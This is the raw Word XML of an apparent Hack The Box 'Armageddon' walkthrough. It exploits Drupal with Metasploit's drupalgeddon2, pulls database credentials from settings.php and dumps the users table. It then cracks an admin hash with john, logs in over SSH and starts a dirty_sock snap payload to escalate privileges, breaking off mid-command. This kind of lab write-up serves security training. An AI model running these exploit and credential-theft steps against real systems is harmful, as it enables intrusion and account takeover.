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427" w:rsidRDefault="00CB5427" w:rsidP="00CB5427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3E62E7" w:rsidRDefault="006E57CD" w:rsidP="00CB5427">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB5427">
        <w:t>10.10.10.233</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB5427" w:rsidRDefault="00CC5D9D" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="439C8E61" wp14:editId="377529AE">
            <wp:extent cx="5048250" cy="2867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CD" w:rsidRDefault="006E57CD" w:rsidP="00CB5427"/>
    <w:p w:rsidR="006E57CD" w:rsidRDefault="00441EF3" w:rsidP="00CB5427">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00704F96" w:rsidRPr="00FC0A31">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.10.233/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00704F96" w:rsidRDefault="00AC6106" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2500E178" wp14:editId="4BE6508F">
            <wp:extent cx="5731510" cy="33635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106" w:rsidRDefault="00AC6106" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00AC6106" w:rsidRDefault="003E72B4" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A78B517" wp14:editId="55FD0F46">
            <wp:extent cx="5731510" cy="23094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B4" w:rsidRDefault="003E72B4" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00736362" w:rsidRDefault="00736362" w:rsidP="00736362">
      <w:pPr>
        <w:pStyle w:val="hw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>Let’s check if we can work a way around the login page!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00736362" w:rsidRDefault="00736362" w:rsidP="00736362">
      <w:pPr>
        <w:pStyle w:val="hw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2"/>
          <w:szCs w:val="32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t xml:space="preserve">Exploring, I found that Drupal 7 can be exploited using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</w:rPr>
        <w:t>Metasploit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t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E72B4" w:rsidRDefault="003E72B4" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00CE2CD6" w:rsidRDefault="00CE2CD6" w:rsidP="00CE2CD6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CE2CD6" w:rsidRDefault="00CE2CD6" w:rsidP="00CE2CD6">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CE2CD6" w:rsidRDefault="00CE2CD6" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00736362" w:rsidRDefault="00CE2CD6" w:rsidP="00CB5427">
      <w:r w:rsidRPr="00CE2CD6">
        <w:t xml:space="preserve">msf6 &gt; search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE2CD6">
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CC5D9D" w:rsidRDefault="00724A98" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F41EACF" wp14:editId="3926C9D4">
            <wp:extent cx="5731510" cy="1532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98" w:rsidRDefault="00724A98" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00F21C30" w:rsidRDefault="00F21C30" w:rsidP="00CB5427">
      <w:r w:rsidRPr="00F21C30">
        <w:t>msf6 &gt; use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F21C30">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F21C30">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F21C30">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F21C30">
        <w:t>/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC5D9D" w:rsidRDefault="00F21C30" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FDB047F" wp14:editId="32145D19">
            <wp:extent cx="5731510" cy="28276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C30" w:rsidRDefault="00F21C30" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00F21C30" w:rsidRDefault="00A238BC" w:rsidP="00CB5427">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A238BC">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A238BC">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238BC">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238BC">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A238BC">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A238BC">
        <w:t>/drupal_drupalgeddon2) &gt; set RHOSTS 10.10.10.233</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A238BC" w:rsidRDefault="00C13507" w:rsidP="00CB5427">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C13507">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C13507">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C13507">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C13507">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C13507">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C13507">
        <w:t>/drupal_drupalgeddon2) &gt; set LHOST 10.10.14.35</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C13507" w:rsidRDefault="00B26765" w:rsidP="00CB5427">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B26765">
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B26765">
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B26765">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B26765">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B26765">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B26765">
        <w:t>/drupal_drupalgeddon2) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B26765" w:rsidRDefault="003D7FC9" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42A3E30C" wp14:editId="7DC36671">
            <wp:extent cx="5731510" cy="15214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C9" w:rsidRDefault="003D7FC9" w:rsidP="00CB5427"/>
    <w:p w:rsidR="003D7FC9" w:rsidRDefault="001803EC" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21CE1AF7" wp14:editId="7B495A45">
            <wp:extent cx="1771650" cy="60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C" w:rsidRDefault="001803EC" w:rsidP="00CB5427"/>
    <w:p w:rsidR="001803EC" w:rsidRDefault="00B819D8" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064075E3" wp14:editId="36A34C74">
            <wp:extent cx="1771650" cy="4057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D8" w:rsidRDefault="00B819D8" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00B819D8" w:rsidRDefault="000F3676" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095D4E2B" wp14:editId="37893DAF">
            <wp:extent cx="1390650" cy="1009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676" w:rsidRDefault="000F3676" w:rsidP="00CB5427"/>
    <w:p w:rsidR="000F3676" w:rsidRDefault="002A29BB" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74EDCC39" wp14:editId="365D0F91">
            <wp:extent cx="169545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BB" w:rsidRDefault="002A29BB" w:rsidP="00CB5427"/>
    <w:p w:rsidR="002A29BB" w:rsidRDefault="00755860" w:rsidP="00CB5427">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00755860">
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00755860">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00755860">
        <w:t>settings.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00755860" w:rsidRDefault="00441AF6" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ADE5257" wp14:editId="77A5FF6F">
            <wp:extent cx="5731510" cy="62344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F6" w:rsidRDefault="00441AF6" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00441AF6" w:rsidRDefault="00C30458" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49201CAB" wp14:editId="33A9F25D">
            <wp:extent cx="5731510" cy="68459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58" w:rsidRDefault="000912A9" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="395F4BA4" wp14:editId="3E6A609F">
            <wp:extent cx="5731510" cy="64763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A9" w:rsidRDefault="000912A9" w:rsidP="00CB5427"/>
    <w:p w:rsidR="000912A9" w:rsidRDefault="004E43AE" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB4C1DF" wp14:editId="4F075B88">
            <wp:extent cx="5731510" cy="63627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AE" w:rsidRDefault="004E43AE" w:rsidP="00CB5427"/>
    <w:p w:rsidR="004E43AE" w:rsidRDefault="00C74A51" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24C44140" wp14:editId="3EDD530C">
            <wp:extent cx="5731510" cy="62884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51" w:rsidRDefault="00C74A51" w:rsidP="00CB5427"/>
    <w:p w:rsidR="00C74A51" w:rsidRDefault="001445CC" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="282058AD" wp14:editId="38B991A5">
            <wp:extent cx="5731510" cy="58261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CC" w:rsidRDefault="001445CC" w:rsidP="00CB5427"/>
    <w:p w:rsidR="001445CC" w:rsidRDefault="00885407" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18E67C1E" wp14:editId="34940B79">
            <wp:extent cx="3343275" cy="2409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407" w:rsidRDefault="00885407" w:rsidP="00885407">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>' =&gt; '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupaluser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00885407" w:rsidRDefault="00885407" w:rsidP="00885407">
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>' =&gt; 'CQHEy@9M*m23gBVj',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F4A78" w:rsidRDefault="008F4A78" w:rsidP="00885407"/>
    <w:p w:rsidR="008F4A78" w:rsidRDefault="00441EF3" w:rsidP="00885407">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupaluser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p -e ‘</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="008F4A78" w:rsidRPr="008F4A78">
        <w:t>show databases;</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F4A78" w:rsidRDefault="008F4A78" w:rsidP="00885407">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC125AB" wp14:editId="4A604DB1">
            <wp:extent cx="3476625" cy="1171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78" w:rsidRDefault="008F4A78" w:rsidP="00885407"/>
    <w:p w:rsidR="00885407" w:rsidRDefault="00885407" w:rsidP="00885407"/>
    <w:p w:rsidR="00BB7787" w:rsidRDefault="00BA1C11" w:rsidP="00885407">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BA1C11">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BA1C11">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA1C11">
        <w:t>drupaluser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA1C11">
        <w:t xml:space="preserve"> -p -D '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA1C11">
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA1C11">
        <w:t>' -e 'show tables;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1C11" w:rsidRDefault="007F63DF" w:rsidP="00885407">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F38D232" wp14:editId="5B36AC63">
            <wp:extent cx="4210050" cy="7210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3DF" w:rsidRDefault="00627ABA" w:rsidP="00885407">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30929B1F" wp14:editId="0E352898">
            <wp:extent cx="2343150" cy="449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BA" w:rsidRDefault="00627ABA" w:rsidP="00885407"/>
    <w:p w:rsidR="008B0CCD" w:rsidRDefault="008B0CCD" w:rsidP="00885407">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B0CCD">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B0CCD">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B0CCD">
        <w:t>drupaluser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B0CCD">
        <w:t xml:space="preserve"> -p -D '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B0CCD">
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B0CCD">
        <w:t>' -e 'select * from users;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B0CCD" w:rsidRDefault="002950BD" w:rsidP="00885407">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ED449AC" wp14:editId="18A1B858">
            <wp:extent cx="5731510" cy="73883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4587" cy="74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0BD" w:rsidRDefault="00D808B4" w:rsidP="00885407">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D808B4" w:rsidRDefault="00D808B4" w:rsidP="00885407">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D808B4">
        <w:t>brucetherealadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D808B4">
        <w:t xml:space="preserve">       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D808B4" w:rsidRDefault="00D808B4" w:rsidP="00885407"/>
    <w:p w:rsidR="00BE0583" w:rsidRDefault="00BE0583" w:rsidP="00885407">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1287890E" wp14:editId="40B2FD28">
            <wp:extent cx="4391025" cy="628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83" w:rsidRDefault="00BE0583" w:rsidP="00885407"/>
    <w:p w:rsidR="00884C96" w:rsidRDefault="00884C96" w:rsidP="00884C96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BE0583" w:rsidRDefault="00884C96" w:rsidP="00884C96">
      <w:r>
        <w:t>└─# john hash --wordlist=rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00885407" w:rsidRDefault="00885407" w:rsidP="00885407"/>
    <w:p w:rsidR="00884C96" w:rsidRDefault="004441EB" w:rsidP="00885407">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C1B2697" wp14:editId="7EEB7069">
            <wp:extent cx="5731510" cy="14382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EB" w:rsidRDefault="004441EB" w:rsidP="00885407">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
      <w:r w:rsidRPr="004441EB">
        <w:t>booboo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004441EB" w:rsidRDefault="004441EB" w:rsidP="00885407"/>
    <w:p w:rsidR="004C1574" w:rsidRDefault="004C1574" w:rsidP="004C1574">
      <w:r>
        <w:t>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4C1574" w:rsidRDefault="004C1574" w:rsidP="004C1574">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00FC0A31">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>brucetherealadmin@10.10.10.233</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004C1574" w:rsidRDefault="009338F0" w:rsidP="004C1574">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0333A521" wp14:editId="08DBE2B2">
            <wp:extent cx="5731510" cy="14243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F0" w:rsidRDefault="009338F0" w:rsidP="004C1574"/>
    <w:p w:rsidR="009338F0" w:rsidRDefault="00863564" w:rsidP="004C1574">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5735A9FA" wp14:editId="04DE704F">
            <wp:extent cx="5731510" cy="12604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64" w:rsidRDefault="00863564" w:rsidP="004C1574">
      <w:r>
        <w:t xml:space="preserve">User.txt: </w:t>
      </w:r>
      <w:r w:rsidR="00ED54A9" w:rsidRPr="00ED54A9">
        <w:t>ae611d2c546da871</w:t>
      </w:r>
      <w:r w:rsidR="00F2100B">
        <w:t>XXXXXXXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863564" w:rsidRDefault="00863564" w:rsidP="004C1574"/>
    <w:p w:rsidR="00863564" w:rsidRDefault="008B5612" w:rsidP="004C1574">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04703CB6" wp14:editId="7E436BD3">
            <wp:extent cx="5731510" cy="1272845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1677" cy="128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12" w:rsidRDefault="008B5612" w:rsidP="004C1574"/>
    <w:p w:rsidR="008B5612" w:rsidRDefault="00F759F3" w:rsidP="004C1574">
      <w:r w:rsidRPr="00F759F3">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F759F3">
        <w:t>brucetherealadmin@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F759F3">
        <w:t xml:space="preserve"> ~]$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F759F3">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F759F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F759F3">
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F759F3" w:rsidRDefault="00A15AAC" w:rsidP="004C1574">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21B3AA93" wp14:editId="57B6FA01">
            <wp:extent cx="3943350" cy="581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AC" w:rsidRDefault="00A15AAC" w:rsidP="004C1574"/>
    <w:p w:rsidR="00A15AAC" w:rsidRDefault="00441EF3" w:rsidP="004C1574">
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="00295FC0" w:rsidRPr="00FC0A31">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00295FC0" w:rsidRDefault="00F133B6" w:rsidP="004C1574">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66416756" wp14:editId="22D77D60">
            <wp:extent cx="5731510" cy="1484986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4078" cy="149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B6" w:rsidRDefault="00F133B6" w:rsidP="004C1574"/>
    <w:p w:rsidR="0083143B" w:rsidRDefault="00441EF3" w:rsidP="004C1574">
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="0083143B" w:rsidRPr="00FC0A31">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gitlab.com/tamilcode/dirty-sock-exploit/-/blob/main/dirty_sock_exploit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0083143B" w:rsidRDefault="0083143B" w:rsidP="004C1574"/>
    <w:p w:rsidR="00E9475A" w:rsidRDefault="00E9475A" w:rsidP="00E9475A">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brucetherealadmin@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /]$ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00885407" w:rsidRDefault="00B67D0B" w:rsidP="00CB5427">
      <w:r w:rsidRPr="00B67D0B">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B67D0B">
        <w:t>brucetherealadmin@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B67D0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B67D0B">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B67D0B">
        <w:t xml:space="preserve">]$ python2 -c 'print "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" + "A"*4256 + "=="' | base64 -d &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B67D0B">
        <w:t>dedsec.snap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B67D0B" w:rsidRDefault="00092D0D" w:rsidP="00CB5427">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="741A0BC1" wp14:editId="3A6DA96C">
            <wp:extent cx="5731510" cy="1324051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9302" cy="13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D27" w:rsidRDefault="009E09E4" w:rsidP="00CB5427">
      <w:r w:rsidRPr="009E09E4">
        <w:lastRenderedPageBreak/>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E09E4">
        <w:t>brucetherealadmin@armageddon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E09E4">
